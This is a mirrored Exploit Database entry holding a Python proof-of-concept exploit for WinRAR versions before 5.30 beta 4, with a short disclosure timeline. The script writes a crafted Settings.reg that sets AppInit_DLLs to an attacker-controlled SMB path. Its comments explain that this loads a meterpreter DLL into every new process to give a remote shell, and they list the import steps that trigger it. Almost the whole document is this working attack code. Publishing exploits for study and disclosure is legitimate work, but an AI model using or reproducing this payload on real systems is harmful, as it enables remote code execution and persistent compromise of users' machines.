WinRar < 5.30 Beta 4 - Settings Import Command Execution

• Exploit Database
• 222 阅读

• 作者： R-73eN
  日期： 2015-10-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38381/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55

  #!/usr/bin/python -w # Title : WinRar Settings Import Command Execution # Date : 02/10/2015 # Author : R-73eN # Tested on : Windows 7 Ultimate # Vulnerable Versions : Winrar < 5.30 beta 4 # The vulnerability exists in the "Import Settings From File" function. # Since Settings file of Winrar are saved as a registry file and WinRar executes # it in an automatic way without checking if it is writing to the Registry keys # used by winrar, we can create a specially crafted settings file and we can # overwrite registry keys. # Since we have access to registry there are various ways we could use this to # get code execution such as defining "RUN" keys or creating new services etc # However the best way to get code execution is using AppInit DLLs # AppInit DLLs are DLLs that are loaded into any process when it starts. # In this case, we can specify a meterpreter DLL payload using a UNC path on # an SMB server we control and then next time a new process starts we will # get a shell. # Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571 # # Triggering the vulnerability # 1) Run this python script. # 2) Open WinRar # 3) Click Options # 4) Click Import/Export # 5) Import Settings from file # 6) Select the Specially crafted Settings.reg file # # Disclosure Timeline: # 01/10/2015 - Vendor Contacted POC provided # 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 onto verify # presence of [HKEY_CURRENT_USER\Software\WinRAR] or # [HKEY_CURRENT_USER\Software\WinRAR\ # #   banner = "" banner +="_________ __\n" banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n" banner +="| || &apos;_ \| |_ / _ \| |_ / _ \ &apos;_ \/ _ \ | |\n" banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n" banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner print "[+] WinRar Settings Import Command Execution [+]\n" dll = raw_input("[+] Enter dll location (smb) : ") dll = dll.replace("\\","\\\\") print "[+] Writing Contet To Settings.reg [+]" evil = &apos;Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]\n"AppInit_DLLs"="&apos; + dll + &apos;"\n"LoadAppInit_DLLs"=dword:00000001\n&apos; print evil f = open("Settings.reg","w") f.write(evil) f.close() print "[+] Settings.reg created successfully [+]" print "\n https://www.infogen.al/ \n"